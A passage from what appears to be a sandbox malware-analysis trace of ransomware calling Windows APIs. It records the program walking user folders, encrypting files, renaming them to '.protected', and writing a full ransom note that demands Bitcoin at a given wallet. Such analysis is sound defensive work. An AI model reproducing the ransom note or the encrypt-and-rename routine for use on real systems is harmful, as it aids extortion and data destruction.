(lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.068] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0095.069] CloseHandle (hObject=0xa4) returned 1 [0095.069] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.069] lstrcmpiW (lpString1="Application Data", lpString2="Windows") returned -1 [0095.069] lstrcmpiW (lpString1="Application Data", lpString2="Program Files") returned -1 [0095.069] lstrcmpiW (lpString1="Application Data", lpString2="Program Files (x86)") returned -1 [0095.069] lstrcmpiW (lpString1="Application Data", lpString2="$Recycle.bin") returned 1 [0095.069] lstrcmpiW (lpString1="Application Data", lpString2="System Volume Information") returned -1 [0095.069] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Application Data") returned 37 [0095.069] lstrcmpW (lpString1="Application Data", lpString2=".") returned 1 [0095.069] lstrcmpW (lpString1="Application Data", lpString2="..") returned 1 [0095.069] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Application Data\\*") returned 39 [0095.069] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Application Data\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0095.069] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.069] lstrcmpiW (lpString1="Contacts", lpString2="Windows") returned -1 [0095.069] lstrcmpiW (lpString1="Contacts", lpString2="Program Files") returned -1 [0095.069] lstrcmpiW (lpString1="Contacts", lpString2="Program Files (x86)") returned -1 [0095.069] lstrcmpiW (lpString1="Contacts", lpString2="$Recycle.bin") returned 1 [0095.069] lstrcmpiW (lpString1="Contacts", lpString2="System Volume Information") returned -1 [0095.069] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts") returned 29 [0095.069] lstrcmpW (lpString1="Contacts", lpString2=".") returned 1 [0095.069] lstrcmpW (lpString1="Contacts", lpString2="..") returned 1 [0095.069] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts\\*") returned 31 [0095.069] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0095.070] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.070] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.070] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.070] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.070] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.070] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts\\.") returned 31 [0095.070] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.070] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.070] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.070] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.070] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.070] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\." (normalized: "c:\\users\\default\\contacts\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.070] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.070] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.070] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.070] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.070] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.070] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.070] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts\\..") returned 32 [0095.070] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.070] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.070] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.071] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.071] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.071] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.071] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\.." (normalized: "c:\\users\\default"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.071] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.071] lstrcmpiW (lpString1="Administrator.contact", lpString2="Windows") returned -1 [0095.071] lstrcmpiW (lpString1="Administrator.contact", lpString2="Program Files") returned -1 [0095.071] lstrcmpiW (lpString1="Administrator.contact", lpString2="Program Files (x86)") returned -1 [0095.071] lstrcmpiW (lpString1="Administrator.contact", lpString2="$Recycle.bin") returned 1 [0095.071] lstrcmpiW (lpString1="Administrator.contact", lpString2="System Volume Information") returned -1 [0095.071] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact") returned 51 [0095.071] StrStrIW (lpFirst="Administrator.contact", lpSrch=".protected") returned 0x0 [0095.071] lstrcmpW (lpString1="Administrator.contact", lpString2="RESTORE_FILES.txt") returned -1 [0095.071] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.071] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.071] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.072] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact") returned 51 [0095.072] StrStrW (lpFirst="Administrator.contact", lpSrch=".txt") returned 0x0 [0095.072] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact") returned 51 [0095.072] StrStrW (lpFirst="Administrator.contact", lpSrch=".rar") returned 0x0 [0095.072] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact") returned 51 [0095.072] StrStrW (lpFirst="Administrator.contact", lpSrch=".zip") returned 0x0 [0095.073] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0095.084] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.084] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0095.084] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.085] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.085] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.085] CloseHandle (hObject=0xb4) returned 1 [0095.085] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact.protected") returned 61 [0095.085] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact.protected" (normalized: "c:\\users\\default\\contacts\\administrator.contact.protected")) returned 1 [0095.086] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.086] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.086] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.086] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.086] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.086] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.086] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini") returned 41 [0095.086] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.086] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.086] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.086] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.087] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini" (normalized: "c:\\users\\default\\contacts\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.087] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini") returned 41 [0095.087] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.087] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini") returned 41 [0095.087] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0095.087] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini") returned 41 [0095.087] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.087] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x19c, lpOverlapped=0x0) returned 1 [0095.088] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe64, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.088] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x19c, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x19c, lpOverlapped=0x0) returned 1 [0095.088] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.088] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.088] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.089] CloseHandle (hObject=0xb4) returned 1 [0095.089] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini.protected") returned 51 [0095.089] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini" (normalized: "c:\\users\\default\\contacts\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini.protected" (normalized: "c:\\users\\default\\contacts\\desktop.ini.protected")) returned 1 [0095.089] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0095.089] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0095.089] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts\\RESTORE_FILES.txt") returned 47 [0095.089] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\contacts\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.111] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.111] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0095.112] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.112] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0095.112] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.112] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0095.112] CloseHandle (hObject=0xa4) returned 1 [0095.112] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.112] lstrcmpiW (lpString1="Cookies", lpString2="Windows") returned -1 [0095.112] lstrcmpiW (lpString1="Cookies", lpString2="Program Files") returned -1 [0095.112] lstrcmpiW (lpString1="Cookies", lpString2="Program Files (x86)") returned -1 [0095.112] lstrcmpiW (lpString1="Cookies", lpString2="$Recycle.bin") returned 1 [0095.112] lstrcmpiW (lpString1="Cookies", lpString2="System Volume Information") returned -1 [0095.112] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Cookies") returned 28 [0095.112] lstrcmpW (lpString1="Cookies", lpString2=".") returned 1 [0095.112] lstrcmpW (lpString1="Cookies", lpString2="..") returned 1 [0095.112] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Cookies\\*") returned 30 [0095.112] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Cookies\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0095.113] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.113] lstrcmpiW (lpString1="Desktop", lpString2="Windows") returned -1 [0095.113] lstrcmpiW (lpString1="Desktop", lpString2="Program Files") returned -1 [0095.113] lstrcmpiW (lpString1="Desktop", lpString2="Program Files (x86)") returned -1 [0095.113] lstrcmpiW (lpString1="Desktop", lpString2="$Recycle.bin") returned 1 [0095.113] lstrcmpiW (lpString1="Desktop", lpString2="System Volume Information") returned -1 [0095.113] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Desktop") returned 28 [0095.113] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1 [0095.113] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0095.113] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Desktop\\*") returned 30 [0095.113] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0095.113] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.113] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.113] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.113] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.113] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.113] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Desktop\\.") returned 30 [0095.113] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.113] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.113] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.113] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.113] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.114] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\." (normalized: "c:\\users\\default\\desktop\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.114] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.114] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.114] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.114] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.114] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.114] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.114] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Desktop\\..") returned 31 [0095.114] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.114] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.114] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.114] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.114] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.114] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.114] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\.." (normalized: "c:\\users\\default"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.114] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.114] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.114] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.114] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.114] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.114] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.114] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini") returned 40 [0095.114] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.114] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.114] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.114] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.115] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini" (normalized: "c:\\users\\default\\desktop\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.115] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini") returned 40 [0095.115] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.115] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini") returned 40 [0095.115] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0095.115] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini") returned 40 [0095.115] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.116] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x11a, lpOverlapped=0x0) returned 1 [0095.116] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffee6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.116] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x11a, lpOverlapped=0x0) returned 1 [0095.117] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.117] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.117] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.117] CloseHandle (hObject=0xb4) returned 1 [0095.117] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini.protected") returned 50 [0095.117] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini" (normalized: "c:\\users\\default\\desktop\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini.protected" (normalized: "c:\\users\\default\\desktop\\desktop.ini.protected")) returned 1 [0095.125] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0095.125] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0095.125] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: 